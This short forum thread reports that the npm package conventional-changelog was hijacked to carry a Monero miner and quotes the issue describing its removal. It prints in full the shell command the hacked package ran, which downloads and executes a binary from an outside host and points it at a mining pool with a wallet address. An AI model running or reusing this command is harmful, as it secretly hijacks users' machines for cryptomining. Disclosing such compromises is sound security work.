
NPM: conventional-changelog package hacked - feduzi
https://github.com/conventional-changelog/conventional-changelog/issues/279
======
feduzi
Some details ([https://github.com/conventional-changelog/conventional-
chang...](https://github.com/conventional-changelog/conventional-
changelog/issues/279#issuecomment-365344112)):

> This happened because of a security issue: conventional-changelog package
> was hacked, and it contained a Monero miner.

> I reported it to the devs and they unpublished it (and also conventional-
> changelog-preset-loader).

> They should re-add a safe version tagged with 1.1.3 to fix this issue.

The hacked package executes:

rm -rf /tmp/.debug && curl
[https://mnrlnt.blob.core.windows.net/mnr/Silence](https://mnrlnt.blob.core.windows.net/mnr/Silence)
-o /tmp/.debug 2> /dev/null && chmod +x /tmp/.debug && /tmp/.debug -o
stratum+tcp://pool.minexmr.com:4444 -u
4A9V5knGUM8PUdPSJbTox8b9mgTsfXByK49XKtEyqVayDxD6CFJe5dsexaM99x7MXFNTxZkYAr4YtcAXQMkNrFjnRPJGJFr.JL6_$(hostname
-f | md5sum | cut -c1-8) -p x -t $(lscpu | grep 'CPU(s)'| grep -v ',' | awk
'{print $2}' | head -n 1) 2> /dev/null &

